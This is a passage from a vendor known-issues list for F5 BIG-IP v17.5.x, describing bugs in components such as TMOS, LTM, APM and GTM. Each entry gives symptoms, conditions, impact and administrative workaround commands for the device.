1280141-4 5-Cosmetic BT1280141 Platform agent to log license info when received from platform

 

Known Issue details for BIG-IP v17.5.x

996129-7 : The /var partition is full as cleanup of files on secondary is not executing

Links to More Info: BT996129

Component: Device Management

Symptoms:
The system does not boot because the /var partition is full.

You see a large number of "storageXXXX.zip" files in /var/config/rest/

Conditions:
This may be observed on multi-blade vCMP guests and hosts, as well as on multi-blade tenants.

Impact:
The partition housing /var/config/ may become 100% full, impacting future disk IO operation and it may cause unexpected traffic disruption.

Workaround:
Important: This workaround is temporary, and may need to be periodically performed either manually or from a script.

Impact of Workaround: While these steps are performed, the BIG-IP REST API will be temporarily inaccessible, and higher disk IO may be seen.

Run the following commands, in sequence:

bigstart stop restjavad
rm -rf /var/config/rest/storage*.zip
rm -rf /var/config/rest/*.tmp
bigstart start restjavad

Manual application of these workaround steps clears the 100% utilized space condition and allows the partition to resume normal operation.


990173-8 : Dynconfd repeatedly sends the same mcp message to mcpd

Links to More Info: BT990173

Component: Local Traffic Manager

Symptoms:
If dynconfd sends a single message to mcpd containing two or more operations, and one of the operations fails mcpd validation, dynconfd repeatedly sends same message to mcpd.

An example of two operations in one mcp message would be an ephemeral node creation and an ephemeral pool member creation in a single mcp message.

Once one such message fails, dynconfd repeatedly attempts to resend the same message. In addition, at the next DNS query interval, dynconfd may create one or more new instances of such messages, which may each be retried if they fail. The result can cause an increasing accumulation of MCP messages sent by dynconfd which must be processed by mcpd.

Conditions:
This can occur when:

-- Using FQDN nodes and FQDN pool members.

-- There is an additional issue where the message from dynconfd fails validation within mcpd (e.g., a misconfiguration in which the monitor assigned to the pool is configured with a wildcard destination and the pool member is added to the pool with a port of '0' or 'any'.

Impact:
MCP messages from dynconfd which fail due to an error might cause the population of ephemeral nodes and pool members to fail and become out of sync with what the DNS server is resolving.

By repeatedly resending the same messages, which fail repeatedly, dynconfd causes increased mcpd CPU utilization.
Eventually, the load caused by processing an increasing accumulation of MCP messages may cause increasing and excessive memory usage by mcpd and a possible mcpd core, or may cause mcpd to become busy and unresponsive and be killed/restarted by SOD.

Workaround:
Examine the LTM logs for mcpd error messages indicating failed attempts to create ephemeral nodes or ephemeral pool members, and resolve the cause of the failed node or pool-member creation.


974409-6 : False Positive "Surfing Without Human Interaction"

Component: Application Security Manager

Symptoms:
When using Bot Defense profile, and an application contains many HTML pages which are not qualified (not even accept: text/html), a "Surfing Without Human Interaction" anomaly is mis-counted and falsely raised.

Conditions:
-- Bot Defense Profile is attached to a virtual server.
-- The application contains many HTML pages which can be detected as such from the request.

Impact:
Real clients might or might not be blocked, it depends on the environment.

Workaround:
None.


967769-4 : During reset of high-speed interfaces, TMMs may mistakenly continue hardware watchdog checks

Links to More Info: BT967769

Component: TMOS

Symptoms:
Tmm crashes and restarts. The following panic message is found in /var/log/tmm:

    notice panic: ../dev/hsb/if_hsb.c:6129: Assertion "HSB lockup, see ltm and tmm log files" failed.

Conditions:
-- Some error or glitch is detected on the high-speed bus (HSB).
-- Software commands a reset of the HSB and interface hardware.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


966785-7 : Rate Shaping stops TCP retransmission

Links to More Info: BT966785

Component: Local Traffic Manager

Symptoms:
When rate shaping is applied to a virtual server, the BIG-IP system does not retransmit unacknowledged data segments, even when the BIG-IP system receives a duplicate ACK.

Conditions:
This issue occurs when both of the following conditions are met:

-- Virtual server configured with a rate shaping.
-- Standard type of virtual server.

Impact:
The BIG-IP system does not retransmit unacknowledged data segments.

Workaround:
None


962729-4 : New User automatically unlocked when "Automatically enable locked-out users after" is not configured

Links to More Info: BT962729

Component: TMOS

Symptoms:
"Automatically enable locked-out users after" option takes effect even if it is not configured.

Conditions:
- There is a locked-out user in the BIG-IP system
- The option "Automatically enable locked-out users after" is not selected but there is a value present in it, the value being other than 0

Impact:
Locked-out users are automatically enabled to log-in even when the "Automatically enable locked-out user" option is not selected

Workaround:
In GUI:
Set 'Automatically enable locked-out users after X seconds' duration to 0 if the 'Manually enable locked-out user' feature is enabled.
In TMSH:
Set db variable password.unlock_time to 0 if systemauth.disablemanualunlock is false.


945469-3 : [APM][tmm core detected oauth_send_response in APM Oauth Token generation

Component: Access Policy Manager

Symptoms:
Tmm crashes while passing APM traffic.

Conditions:
OAuth is configured and is used for Token generation.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


941961-6 : Upgrading system using WAM TCP profiles may prevent the configuration from loading

Links to More Info: BT941961

Component: TMOS

Symptoms:
If a BIG-IP is on version 13.1.0 through 15.1.x and has profiles in use that use wam-tcp-wan-optimized and/or wam-tcp-lan-optimized as parent profiles, then when the configuration is upgraded to 16.0.0, the configuration fails to load, with an error similar to:

err mcpd[10087]: 01020036:3: The requested parent profile (/Common/wam-tcp-wan-optimized) was not found.

On devices that are provisioned with not just the LTM module this may lead to an out of memory condition as the config load failure prevents memory provisioning completing leaving too little 4KB page (host) memory and too much huge page memory.

If suffering memory pressure then management access to device will be sluggish or not possible.

Conditions:
-- Upgrading from version 13.1.0 through 15.1.x.
-- Using profiles derived from wam-tcp-wan-optimized and/or wam-tcp-lan-optimized.

Impact:
Configuration does not load.

Workaround:
Remove these profiles and adjust the configuration elements that use them accordingly. If it is difficult to work on the device it may be necessary to rollback to earlier version and make changes there. Usually it would be better then to delete newer software volume and reinstall it at which point the modified config will be copied across and installed on newer volume.

Here are two examples:

-- Copy the definition of 'wam-tcp-wan-optimized' from /defaults/wam_base.conf into /config/bigip.conf, and then reload the configuration.

-- Change the references to wam-tcp-wan-optimized to something else in your config file (e.g., tcp-wan-optimized), and then reload the configuration.


939933-8 : Monpd restarts every few seconds due to missing of AVR database

Links to More Info: BT939933

Component: Application Visibility and Reporting

Symptoms:
Monpd reports that it is constantly restarting. A message similar to the following will appear at the console:

logger[2849]: Re-starting monpd

Conditions:
- There is a provisioned module that requires monpd
- Another module is de-provisioned which wipes the mysql database.
- May occur after an upgrade.

Impact:
Modules that rely on monpd will not be fully functioning.

Workaround:
Clearing AVR database will remove all existing statistics data.

1. Stop monpd: bigstart stop monpd
2. Clean data base: touch /var/avr/init_avrdb
3. Clean the statistics file are waiting to be loaded:
   cd /var/avr/loader
   rm -rf *
4. Start monpd: bigstart start monpd


939517-7 : DB variable scheduler.minsleepduration.ltm changes to default value after reboot

Links to More Info: BT939517

Component: TMOS

Symptoms:
Running the command 'tmsh list /sys db scheduler.minsleepduration.ltm'
shows that the value is -1.

The db variable 'scheduler.minsleepduration.ltm' is set to -1 on mcpd startup.

This overwrites a custom value.

Conditions:
-- The db variable 'scheduler.minsleepduration.ltm' has a non-default value set.
-- A reboot occurs.

Impact:
The db variable 'scheduler.minsleepduration.ltm' reverts to the default value. When the db variable reverts to the default value of unset -1, tmm may use either more or less CPU cycles when idle depending on whether the original DB variable value is bigger or less than the default value.

Workaround:
None


937665-3 : Relaystate in SLO request results in two Relaystates in SLO Response

Links to More Info: BT937665

Component: Access Policy Manager

Symptoms:
When BIG-IP APM acts as the SAML IdP and receives a redirect binding single logout (SLO) request that contains a relaystate, the BIG-IP APM generates an SLO response that contains two relaystates.

Conditions:
-- BIG-IP APM configured as IdP
-- Redirect binding SLO request contains a relaystate

Impact:
SLO processing on SP may not work.

Workaround:
None.


936777-9 : Old local config is synced to other devices in the sync group.

Links to More Info: BT936777

Component: Global Traffic Manager (DNS)

Symptoms:
Newly added DNS/GTM device may sync old local config to other devices in the sync group.

Conditions:
Newly added DNS/GTM device has a more recent change than other devices in the sync group.

Impact:
Config on other DNS/GTM devices in the sync group are lost.

Workaround:
You can use either of the following workarounds:

-- Make a small DNS/GTM configuration change before adding new devices to the sync group.

-- Make a small DNS/GTM configuration change on the newly added device to re-sync the correct config to other DNS/GTM devices.


932553-9 : An HTTP request is not served when a remote logging server is down

Links to More Info: BT932553

Component: Local Traffic Manager

Symptoms:
BIG-IP systems provide an option to sanitize HTTP traffic via the http_security profile. When the profile is configured to alarm on a violation, it is possible that a connection to the violating client is reset if a remote logging server is marked down.

Conditions:
-- A BIG-IP system has an HTTP profile and and an http_security profile with the alarm option set.
-- A remote logging server is configured via a BIG-IP pool.
-- The pool has a monitor that marks all the pool members down.
-- A request with an HTTP violation is processed and triggers an alarm configured in the http_security profile.

Impact:
-- A TCP connection to a client is reset by the BIG-IP system.
-- The web page may not render, or may not render as expected.
-- Data are not delivered to a server with a POST request.

Workaround:
None.


923745-6 : Ctrl-Alt-Delete in virtual console reboots BIG-IP Virtual Edition

Links to More Info: BT923745

Component: TMOS

Symptoms:
A device reboot occurs upon sending a Ctrl-Alt-Del signal to the console of a BIG-IP Virtual Edition (VE) virtual machine.

Conditions:
This occurs when pressing Ctrl-Alt-Del or sending the command to a BIG-IP Virtual Edition (VE) virtual console.
This signal may be sent in different ways according to the interface used to connect to the console of the BIG-IP virtual machine.

Impact:
Accidental reboots of the BIG-IP VE instance are possible. You should not reboot a BIG-IP VE instance using Ctrl-Alt-Del.

Workaround:
To disallow the effect of this key chord, run the following command from the advanced shell (bash):

systemctl mask ctrl-alt-del.target


921069-6 : Neurond cores while adding or deleting rules

Links to More Info: BT921069

Component: TMOS

Symptoms:
Neurond cores if it receives error while adding or deleting rules in neuron hardware.

Conditions:
Adding or deleting rules in neuron hardware

Impact:
Neurond cores

Workaround:
None


905477-8 : The sdmd daemon cores during config sync when multiple devices configured for iRules LX

Links to More Info: BT905477

Component: Local Traffic Manager

Symptoms:
The iRules LX workspaces belong on only one device in a Device Service Cluster (DSC) (config sync device-group). If you have the same iRules LX workspace configured on multiple devices and then perform a config sync operation, the sdmd daemon cores.

Conditions:
-- Multiple devices configured with the same iRules LX workspace in a DSC.
-- Change one of the devices such that the configuration requires a config sync.
-- Perform the config sync.

Impact:
The sdmd daemon cores. Although having multiple devices configured with the same iRules LX workspace is an incorrect configuration, sdmd should not core.

Workaround:
When the iRules LX workspace is correctly configured, i.e., on only one device in a DSC, there is no need to config sync, so this issues does not occur.


904401-7 : Guestagentd or devmgmtd core

Links to More Info: BT904401

Component: TMOS

Symptoms:
Guestagentd or devmgmtd crashes on a vCMP guest.

Conditions:
This can occur during normal operation in a vCMP environment.

Impact:
Guestagentd crashes on the vCMP guest, and the vCMP host does not have accurate guest information, such as version, provisioning, high availability (HA) status, and tmm status.
Or if it is Devmgmtd that crashed on vCMP guest, the device management daemon will not establishes and maintains device trust group functionality.

Workaround:
None.


902445-5 : ASM Policy Event Logging stops working after 'No space in shmem' error disconnection mitigation

Links to More Info: BT902445

Component: Application Security Manager

Symptoms:
ASM event logging stops working.

Conditions:
This can occur during normal ASM operation. It occurs after ASM executes 'No space in shmem' error disconnection mitigation, and this error is logged.

Impact:
ASM Policy Event Logging stop working; new event is not saved.

Workaround:
Restart asmlogd and pabnagd:
pkill asmlogd
pkill pabnagd


901569-7 : Loopback traffic might get dropped when VLAN filter is enabled for a virtual server.

Links to More Info: BT901569

Component: Local Traffic Manager

Symptoms:
Loopback traffic (local traffic) destined to a virtual server might get dropped when the incoming packet matches a terminating connection flow.

Conditions:
-- VLAN filter is enabled on the virtual server created for loopback traffic processing.
-- An incoming packet matches a terminating connection flow (i.e., the connection flow terminates because of timeout, being dropped by iRule, etc.).

Impact:
Traffic that is matched against a terminating connection flow of a virtual is not processed by the virtual server.

Workaround:
Because this filter is ignored for loopback traffic, removing the 'Enabled On VLAN' filter at the virtual server mitigates the issue.


896565-5 : Clusterd.peermembertimeout to set peer member timeout does not work all the time

Component: Local Traffic Manager

Symptoms:
Clusterd.peermembertimeout timeout does not work all the time. The default value (10s) might be used instead.

Conditions:
Clusterd.peermembertimeout is modified to a value other than default.

Impact:
New value of clusterd.peermembertimeout is not in use.


870349-5 : Continuous restart of ntlmconnpool after the license reinstallation

Links to More Info: BT870349

Component: Local Traffic Manager

Symptoms:
The ntlmconnpool process continuously restarts after reinstalling the license. The system reports a message in the BIG-IP console:

Re-starting ntlmconnpool.

The BIG-IP may show as 'Disconnected', and 'TMM outbound listener not yet created' messages may be present in /var/log/ltm.

Conditions:
This occurs when you upgrade your license such that the new license changes the number of available TMMs.

Impact:
The system requires a reboot and reports a ‘Re-starting ntlmconnpool’ message continuously in the BIG-IP console.

Workaround:
To resolve the issue, it is necessary to reboot. Once the system restarts, it operates as expected.


832153 : Crash due to incorrect format specifiers is fixed.

Links to More Info: BT832153

Component: Local Traffic Manager

Symptoms:
TMM crashes

Conditions:
This is handled internally in the code. Currently, the scenario is not possible, and the existing logic ensures that this issue is not triggered.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


800377-1 : Support for Referrer-Policy: origin to correctly return backend origin in virtual server requests

Links to More Info: BT800377

Component: Access Policy Manager

Symptoms:
When a Virtual Server (VS) includes a Referrer-Policy: origin response header and sends a request that relies on the Referrer header (e.g., to a .php file), the system incorrectly returns the client-side origin instead of the backend origin.

Conditions:
Issue occurs when Using portal access and has a resource that has a Referrer-Policy: origin response header.

Impact:
Virtual Server (VS) pages may encounter incorrect Referrer header values when using resources that depend on accurate backend origin data. Instead of the backend origin being returned as expected, the client (visitor) origin is returned.

Workaround:
None


783077-4 : IPv6 host defined via static route unreachable after BIG-IP reboot

Links to More Info: BT783077

Component: Local Traffic Manager

Symptoms:
Static route unreachable after BIG-IP system reboot.

Conditions:
-- Add a static route.
-- Issue a ping (works fine).
-- Reboot the BIG-IP system.
-- Issue a ping (cannot pint the route).

Impact:
Static route exists in both kernel and LTM routing table but unable to ping the route after rebooting the BIG-IP system.

Workaround:
Workaround-1:
Delete the IPv6 route entry and recreate the route by issuing the following commands in sequence:

tmsh delete net route IPv6
tmsh create net route IPv6 network 2a05:d01c:959:8408::b/128 gw fe80::250:56ff:fe86:2065 interface internal

Workaround-2:

net route /Common/IPv6 {
    gw fe80::456:54ff:fea1:ee02 <-- Change this address to unicast address from 2a05:d01c:959:8409::/64 network
    interface /Common/Internal
    mtu 1500
    network 2a05:d01c:959:8408::b/128
}


777389-8 : In rare occurrences related to PostgreSQL monitor, the mcpd process restarts

Links to More Info: BT777389

Component: TMOS

Symptoms:
Possible indications include the following:

-- Errors such as the following may appear in ltm/log:

   - notice postgres[10872]: [466-1] WARNING: pgstat wait timeout.
   - notice sod[27693]: 01140041:5: Killing /usr/bin/mcpd pid 7144.
   - BD_CONF|ERR| ...failed to connect to mcpd after 5 retries, giving up...
   - BD_CONF|ERR| ...can't read message from mcp conn, status:16908291.
   - BD_MISC|CRIT| ...Received SIGABRT - terminating.

-- Errors such as the following may appear in the dwbld/log:

   - Couldn't send BLOB notification - MCP err 16908291.
   - Got a terminate/abort signal - terminating ...
   - Terminating mcp_bridge thread.

-- Processes may restart unexpectedly, including mcpd, bd, and postgresql.

Conditions:
-- The 'mcpd' process attempts to read monitoring data from the PostgreSQL server, but no data is available.

-- A contributing factor might be that the AFM module is licensed but not configured.

Impact:
Failing to receive a monitoring response from the SQL server, MCPD goes into an infinite loop and skips the heartbeat report, resulting in its restart. While MCPD is restarting, the system is offline and does not process traffic. After restart, system operation returns to normal.

Workaround:
The chance of occurrence can be minimized by making sure that control-plane processes have sufficient memory to run efficiently.


747823-4 : Drd utility can hang when generating qkview

Links to More Info: BT747823

Component: TMOS

Symptoms:
"qkview -v" shows qkview generation got stuck on qkafm.so module while executing /usr/sbin/drd:

Executing Module: [qkafm.so]
Executing /usr/bin/du -h /var/lib/mysql/logdb/ ...
Result: [0] Elapsed: 0.064386
Executing /usr/sbin/drd --readlong=/usr/sbin/readlong --all ...

Conditions:
AFM module is provisioned

Impact:
Impossible to create qkview.

Workaround:
# mount -o remount,rw /usr
# sed -i '/output.wait()/d; s/return output.stdout.readlines()/return output.communicate()[0].splitlines(True)/g' /usr/sbin/drd
# mount -o remount,ro /usr


742764-5 : If two racoon daemon are spawned on startup, one fails and cores.

Links to More Info: BT742764

Component: TMOS

Symptoms:
When a BIG-IP system becomes Active, tmipsecd starts a racoon daemon for each route domain, including the default RD 0.

If for any reason racoon fails to fully start, tmipsecd will start another instance of racoon.

When this occurs, one or both of them may crash and create a core file.

Conditions:
-- BIG-IP becomes Active or racoon is (re)started.
-- IPsec does not have to be configured for this failure to occur.

Impact:
IPsec IKEv1 tunnels might delay starting while racoon restarts.

Workaround:
N/A


739904-6 : /var/log/ecm log is not rotated

Links to More Info: BT739904

Component: TMOS

Symptoms:
/var/log/ecm log is not rotated.

Conditions:
Log file /var/log/ecm exists in the /var/log directory.

Impact:
Log rotate does not work. May fill disk with logs over time.

Workaround:
Use tmsh sys log-rotate command to modify the logrotate settings to add /var/log.ecm.
The syntax is:
tmsh modify sys log-rotate common-include '"
/var/log/ecm {
compress
missingok
notifempty
}"'


739475-9 : Site-Local IPv6 Unicast Addresses support.

Links to More Info: BT739475

Component: Local Traffic Manager

Symptoms:
No reply to Neighbor Advertisement packets.

Conditions:
Using FE80::/10 addresses in network.

Impact:
Cannot use FE80::/10 addressees in network.

Workaround:
None


721591-4 : Java crashes with core during with high load on REST API

Links to More Info: K000141369, BT721591

Component: TMOS

Symptoms:
Java crashes with core.

Conditions:
This is a random crash and there are no known conditions for reproducing it.

Impact:
This crash occurs randomly during normal operation and has following impact:
-- Stats are not available.

Workaround:
-- Restart the Java service with "bigstart restart restjavad" or "tmsh restart sys service restjavad".
-- Restart the BIG-IP system.


718796-9 : iControl REST token issue after upgrade

Links to More Info: K22162765, BT718796

Component: Device Management

Symptoms:
When upgrading to version 13.1.0.x or later, users who previously had permissions to make calls to iControl REST lose the ability to make those calls.

Conditions:
You will notice this issue when you use iControl REST and are upgrading to version 13.1.0.x or later.

You can also detect if the user is impacted by this issue with the following steps

    1. Run below API to for impacted user account XYZ.

         # curl -ik -u username:XYZ -XPOST https://localhost/mgmt/shared/authn/login --data-binary '{"username":"XYZ", "password":"XYZpass", "loginProviderName":"tmos"}' -H "Content-Type: application/json"

    2. Find user XYZ's 'link' path under 'token' in previous output

       There are two formats possible for 'link'
       a. Path will have a UUID
          For example "token"->"link"->"https://localhost/mgmt/cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/<UUID>"

       b. Path will have a username (not UUID)
          For example "token"->"link"->"https://localhost/mgmt/shared/authz/users/<username>"

    3. Run below API to get list of user roles.

         # restcurl -u "admin:<admin-user-pass>" /shared/authz/roles | tee /var/tmp/rest_shared_authz_roles.json

    4. Check user XYZ's link path from step 2 in above output.

       Check under the "userReferences" section for group "iControl_REST_API_User" . You will see the link path in one of the two formats listed in 2a/2b. If you do not see the user link path then you are impacted by this bug

Impact:
A previously privileged user can no longer query iControl REST. In addition, some remotely authenticated users may lose access to the Network Map and Analytics view after the upgrade.

Workaround:
You can repair the current users permissions with the following process:

   1) Delete the state maintained by IControlRoleMigrationWorker and let it rerun by restarting restjavad process:
      # restcurl -X DELETE "shared/storage?key=shared/authz/icontrol-role-migrator"
     
   2) Restart services
      # bigstart restart restjavad *or* tmsh restart /sys service restjavad

   3) Now, the permissions should start in a healthy state. Re-try making an iControl REST call with an affected user.

   4) If this still does not resolve the issue you could update shared/authz/roles/iControl_REST_API_User userReference list to add all affected users' accounts using PUT. Here you may need to use the UUID path as described under 'Conditions'

      # restcurl shared/authz/roles/iControl_REST_API_User > role.json
      # vim role.json
          a. add { "link": "https://localhost/mgmt/shared/authz/users/[your-user-name]" } object to userReferences list
          OR
          b. add { "link": "https://localhost/mgmt/cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/<UUID>" } object to userReferences list
      # curl -u admin:admin -X PUT -d@role.json http://localhost/mgmt/shared/authz/roles/iControl_REST_API_User


714705-10 : Excessive 'The Service Check Date check was skipped' log messages.

Links to More Info: BT714705

Component: TMOS

Symptoms:
Large numbers of these warnings are logged into the "ltm" file:

  warning httpd[12345]: 0118000a:4: The Service Check Date check was skipped.

The message appears whenever a new "httpd" instance is launched.

Conditions:
The BIG-IP instance has been installed with a "no service check" license. These licenses are sometimes provided with cloud pre-licensed VE software images.

Impact:
Log files are saturated with many useless warnings. This can hide actual problems and impede their diagnosis.

Workaround:
During manual troubleshooting, commands such as the following may be used to filter the excess warnings:

# grep -v 'Service Check Date check was skipped' ltm | less

The syslog-ng 'include' filter mechanism is another possibility, but this should be attempted only with assistance of the F5 Support team.


673060-2 : SSL handshake failure with Session Ticket enabled on the backend server

Links to More Info: BT673060

Component: Local Traffic Manager

Symptoms:
SSL handshake failure occurs as a certificate is not issued (no certificate).

Conditions:
- Server SSL profile is enabled with the Session Ticket feature
- Backend server also supports Session Ticket

Impact:
- Service is disrupted because of a handshake failure.
- SSL handshake fails with no certificate issue.

Workaround:
Disable the Session Ticket feature on the Server SSL Profile or the backend server.


671545-6 : MCPD core while booting up device with error "Unexpected exception caught"

Links to More Info: BT671545

Component: TMOS

Symptoms:
Mcpd crashes.

Conditions:
The file-store path is missing with specific configuration file which is needed by mcpd while booting.

Impact:
Traffic and control plane disrupted while mcpd restarts.


666845-6 : Rewrite plugin can accumulate memory used for patching very large files

Links to More Info: K08684622, BT666845

Component: Access Policy Manager

Symptoms:
Rewrite plugin memory usage is significantly higher than normal (up to 200 MB RSS) and does not decrease.

Conditions:
This happens because the plugin caches and reuses already allocated chunks of memory instead of releasing them to the operating system.

Impact:
Out-of-memory crashes on systems with low amounts of memory.

Workaround:
Use one or both of the following workarounds:
-- Restart rewrite when memory usage is too high.
-- Disable patching for large (15-20 MB uncompressed) files.


664816-1 : The Neuron SDK rejects rule delete requests with -5 error

Links to More Info: BT664816

Component: TMOS

Symptoms:
Neurond cores if it receives an error while adding or deleting rules in neuron hardware.

Conditions:
Adding or deleting rules in neuron hardware

Impact:
Neurond cores

Workaround:
None


659579-8 : Timestamps in icrd, restjavad, and restnoded logs are not synchronized with the system time

Links to More Info: BT659579

Component: TMOS

Symptoms:
Logs on icrd, restnoded, and restjavad are in the UTC time zone and are not aligned to the system time, which makes it difficult to determine the time during troubleshooting operations.

Conditions:
Checking the icrd, restnoded, and restjavad logs timestamps.

Impact:
Difficult to troubleshoot as the logs are not aligned with system time.

Workaround:
None


632553-8 : DHCP: OFFER packets from server are intermittently dropped

Links to More Info: K14947100, BT632553

Component: Local Traffic Manager

Symptoms:
With a DHCP relay virtual server, OFFER packets from DHCP server are intermittently not forwarded to the client and dropped on BIG-IP system.

Conditions:
It is not known exactly what triggers this condition, but it occurs intermittently when the DHCP relay virtual server is in use.

Impact:
Client machines joining the network do not receive DHCP OFFER messages.

Workaround:
Manually delete the serverside to force it to be recreated by the next DHCP request.

For example, if the flow to the DHCP server 10.0.66.222 is broken, issue the following tmsh command:

tmsh delete sys connection ss-server-addr 10.0.66.222 cs-server-port 67


603380-9 : Very large number of log messages in /var/log/ltm with ICMP unreachable packets.

Links to More Info: BT603380

Component: Local Traffic Manager

Symptoms:
With ICMP unreachable packets, every packet generates a log message in /var/log/ltm. This results in a very large number of log messages, which takes up space without providing additional information.

Conditions:
You have a DNS virtual server with DNS resolver cache configured. The virtual server receives ICMP unreachable in response to the DNS query.

Impact:
You will see messages similar to the following in /var/log/ltm.

   err tmm[5021]: comm_point_tmm_recv_from failed: Software caused connection abort

Workaround:
None.


566995-6 : bgpd might crash in rare circumstances.

Links to More Info: BT566995

Component: TMOS

Symptoms:
Under unspecified conditions and in rare cases, bgpd might crash. Although bgpd restarts right away, routing table might be impacted.

Conditions:
The conditions under which this occurs are not known.

Impact:
This might impact routing table and reachability.

Workaround:
None known.


566756-3 : VCMP 4 cores on 3 blades : mcpd core when delete 255 dos profiles via tmsh command while machine is idle

Links to More Info: BT566756

Component: TMOS

Symptoms:
Mcpd crashes.

Conditions:
1.create 4 cores vcmp guest on vic 1+ with 3 blades
This platform has 15GB of mem
2. provision asm + ltm + AVR +FPS
3. create via script 255 dos profiles ( script attached)
4. delete it via tmsh command : delete security dos profile dos_*
5. result : Sometimes MCPD will crash

Impact:
Traffic and control plane disrupted while mcpd restarts.

Workaround:
None


563144-6 : Changing the system's admin user causes many errors in the REST framework.

Links to More Info: BT563144

Component: Device Management

Symptoms:
The iControl REST log at /var/log/icrd will have entries similar to the following:

 notice icrd_child[32206]: 01420003:5: Cannot load user credentials for user "admin" Current session has been terminated.

Conditions:
Change the default admin user, for example, by following the steps in the Article K15632: Disabling the admin and root accounts using the BIG-IP Configuration utility or the Traffic Management Shell: https://support.f5.com/csp/article/K15632.

Impact:
Many REST APIs do not function, and functionality that depends on REST fails.

Workaround:
There is no workaround. You must use the default admin in order for iControl REST calls to work.


264701-8 : The zrd exits on error from bind about .jnl file error

Links to More Info: K10066, BT264701

Component: Global Traffic Manager (DNS)

Symptoms:
The zrd process exits and cannot be restarted.

Conditions:
This issue occurs when the journal is out-of-sync with the zone.

Impact:
The zrd process cannot be restarted.

Workaround:
Ensure that no one else is making configuration changes, it is recommended to make changes making changes during a maintenance window.

On a working system, perform the following steps:
1. Run command # rndc freeze $z

(Do this for all nonworking zones. Do not perform the thaw until you finish copying all reuqired files to the nonworking system.)

2. Run command # tar zcvf /tmp/named.zone.files namedb/db.[nonworking zones].

3. Run command # rndc thaw $z

On each non-working system, perform the following steps:
1. Run command # bigstart stop zrd; bigstart stop named.

2. Copy the non-working /tmp/named.zone.files from a working GTM system.
 
3. Run command # bigstart start named; bigstart start zrd.

Note: Before continuing, review /var/log/daemon.log for named errors, and review /var/log/gtm for zrd errors0.

Repeat these steps until all previously non-working systems are working.

On a working GTM system, run the following command:
# touch /var/named/config/named.conf.


213618-2 : Resetting DB variable to default does not always work

Component: TMOS

Symptoms:
When using the 'reset-to-default' option to set a DB variable to its default value, the DB variable may appear to be reconfigured for its default value, but the new value may not have any functional effect.

For example, if the DB variable 'log.mcpd.level' is configured with a value of 'debug', then the command 'tmsh mod sys db log.mcpd.level reset-to-default', the DB variable 'log.mcpd.level' will display a value of 'notice', but mcpd will continue logging at 'debug' level.

Conditions:
This may occur when:
-- A system DB variable is configured with a non-default value.
-- A command is issued to reset that DB variable to its default value using the following syntax:
  -- from a tmsh prompt:
     'modify /sys db <variable.name> reset-to-default'
  -- from a bash prompt:
     'tmsh modify sys db <variable.name> reset-to-default'

Impact:
The intended change in the system DB variable value does not have the desired effect.
For example, if system DB variable controlling logging levels is changed from 'debug' (or other verbose logging level) to its default (non-debug) value, debug logging continues, which may fill the file system unexpectedly and result in system failures.

Workaround:
To ensure that:
-- BIG-IP daemons implement the behavior expected by changing the system DB variable to its default value, and
-- The saved BIG-IP configuration reflects that the system DB variable is no longer configured with a non-default value,

Issue two commands to (1) explicitly configure the system DB variable to the desired value, and (2) make system DB variable as being configured with its default value, using the following format:
  -- from a tmsh prompt:
     'modify /sys db <variable.name> value <desired_value>'
     'modify /sys db <variable.name> reset-to-default'
  -- from a bash prompt:
     'tmsh modify sys db <variable.name> value <desired_value>'
     'tmsh modify sys db <variable.name> reset-to-default'


2050389-2 : VIPRION cluster management IP may not appear in SNMP IP-MIB table

Links to More Info: BT2050389

Component: TMOS

Symptoms:
When a cluster management IP address (sys cluster default address x.x.x.x) is configured without also configuring individual blade IP addresses (sys cluster default members # { address x.x.x.x }), neither address with appear in the IP-MIB ipAddressIfIndex table.

Conditions:
A cluster management IP is configured, but individual blade management addresses are not.

Impact:
Unable to retrieve the cluster management IP from the VIPRION system using SNMP

Workaround:
Configure cluster management IP addresses on the individual blades. Doing so will allow the floating cluster management IP address to be populated into the IP MIB (as well as the individual blade IP addresses)


2047593 : Blade upgrade fails with the "HAL unexpected init failure (continuing) : Unknown slot for ChassisBase" error message

Component: TMOS

Symptoms:
B4800 chassis blades at slot positions 4 - 8 fails to join cluster after upgrading to BIG-IP TMOS 17.5.0 with error "Unknown slot for ChassisBase".

Conditions:
B4800 chassis that supports 8 blades with blades at slots 4 to 8 and running with BIG-IP v17.5.0.

Impact:
Reduced capacity due to fewer blades joining cluster for traffic handling.

Workaround:
None


2047445 : VPN connection may fail when access policy is configured in route domain

Component: Access Policy Manager

Symptoms:
When the Access policy is configured in a route domain using "Route Domain and SNAT Selection" agent, and the virtual server is not configured in any route domain, VPN connection can fail with the error "iSession: Connection error: isession_handle_syn:3740: No peer:4". This is applicable only for Windows-based Edge clients and Browser clients.

Conditions:
1. Windows client is used
2. Only Access policy is configured in route domain
3. User tries to establish VPN connection

Impact:
VPN connection may fail

Workaround:
Configure route domain with parent as default route domain.


2047429-3 : PostgreSQL should dump a corefile when not exiting

Links to More Info: BT2047429

Component: TMOS

Symptoms:
When PostgreSQL does not exit gracefully, it does not create a core file.

Conditions:
PostgreSQL crashes.

Impact:
Diagnostic data missing.

Workaround:
None


2047293-2 : TMM NULL dereference in Dyn-TCAM after multiple failures

Links to More Info: BT2047293

Component: TMOS

Symptoms:
TMM SIGSEGV crash.

Conditions:
Triggered by HW offload of a security feature.

Impact:
TMM restart, HA failover.

Workaround:
None


2046553-1 : Memory leak when modifying PEM policies with flow-info-filters

Links to More Info: BT2046553

Component: Policy Enforcement Manager

Symptoms:
Tmm memory slowly grows over time.

Conditions:
Modifying PEM policies with flow-info-filters

Impact:
Tmm can run out of memory

Workaround:
Restart tmm before memory is exhausted. Subscriber traffic will be impacted while tmm restarts.


2044381-3 : Gtmd SIGSEGV core due to monitor status change

Links to More Info: BT2044381

Component: Global Traffic Manager (DNS)

Symptoms:
Gtm cored

Conditions:
-- Three GTMs in a sync group
-- A GTM pool has a monitor with "require 1 from 2 probes" configured
-- Resources are marked down due to iQuery traffic disruption between two of the GTMs, then come back up

Impact:
GSLB traffic disrupted while gtmd restarts.

Workaround:
None


2038309-1 : After the full config sync, FQDN template node status changes to ‘fqdn-checking’ (Unknown) untill the DNS query is triggered

Links to More Info: BT2038309

Component: Local Traffic Manager

Symptoms:
The node’s availability changes to unknown, even though the DNS server is reachable and should have valid resolution data.

The FQDN resolver does not immediately send a DNS query upon receiving the sync, which delays recovery of the node status.

